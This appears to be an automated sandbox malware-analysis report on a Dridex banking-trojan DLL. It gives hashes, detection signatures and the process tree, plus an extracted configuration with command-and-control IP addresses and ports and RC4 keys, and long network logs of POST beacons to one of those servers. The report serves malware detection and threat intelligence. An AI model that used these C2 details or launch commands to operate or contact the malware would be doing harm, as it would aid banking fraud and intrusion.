Loading ...

Play interactive tourEdit tour

Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.28328.4566

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Razy.980776.28328.4566 (renamed file extension from 4566 to dll)
Analysis ID:510682
MD5:d0efc72dad5672591a494c15ab074463
SHA1:4489c041b31862a797a277c2d3f65e53c55d4e27
SHA256:c16c257b6858f74dfba0685a833f4966ccc8e9d4d25d8c0c052109187e37c3ac
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Dridex unpacked file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Detected Dridex e-Banking trojan
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6392 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6424 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6452 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6436 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6620 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6668 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.28328.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000003.347040697.0000000004850000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    00000006.00000003.384482300.0000000002E50000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000000.00000002.784194713.000000006E511000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000000.00000003.388197619.0000000000560000.00000040.00000001.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000003.00000003.347778721.0000000000580000.00000040.00000010.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.3.rundll32.exe.2e6db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              6.3.rundll32.exe.2e6db55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                5.3.rundll32.exe.2eadb55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  3.3.rundll32.exe.59db55.0.raw.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    0.3.loaddll32.exe.57db55.0.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 7 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 3.2.rundll32.exe.6e510000.0.unpackMalware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: SecuriteInfo.com.Variant.Razy.980776.28328.dllVirustotal: Detection: 7%Perma Link
                      Source: SecuriteInfo.com.Variant.Razy.980776.28328.dllReversingLabs: Detection: 27%
                      Source: SecuriteInfo.com.Variant.Razy.980776.28328.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.7:49767 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.7:49771 version: TLS 1.2
                      Source: SecuriteInfo.com.Variant.Razy.980776.28328.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.784937216.000000006E5D7000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.786186037.000000006E5D7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.28328.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E53CEF8 FindFirstFileExW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.77.0.96 235
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.56.219.47 180
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.46.210.220 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 143.244.140.214 40
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 192.46.210.220:443
                      Source: Malware configuration extractorIPs: 143.244.140.214:808
                      Source: Malware configuration extractorIPs: 45.77.0.96:6891
                      Source: Malware configuration extractorIPs: 185.56.219.47:8116
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewASN Name: KELIWEBIT KELIWEBIT
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4869Connection: CloseCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4857Connection: CloseCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 45.77.0.96 45.77.0.96
                      Source: Joe Sandbox ViewIP Address: 185.56.219.47 185.56.219.47
                      Source: global trafficTCP traffic: 192.168.2.7:49768 -> 143.244.140.214:808
                      Source: global trafficTCP traffic: 192.168.2.7:49777 -> 45.77.0.96:6891
                      Source: global trafficTCP traffic: 192.168.2.7:49781 -> 185.56.219.47:8116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50176
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50182
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50184
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50190
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50192
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50198
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50133 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50043 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50100 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50122
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50125
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50098
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50133
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50190 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50141
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50176 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
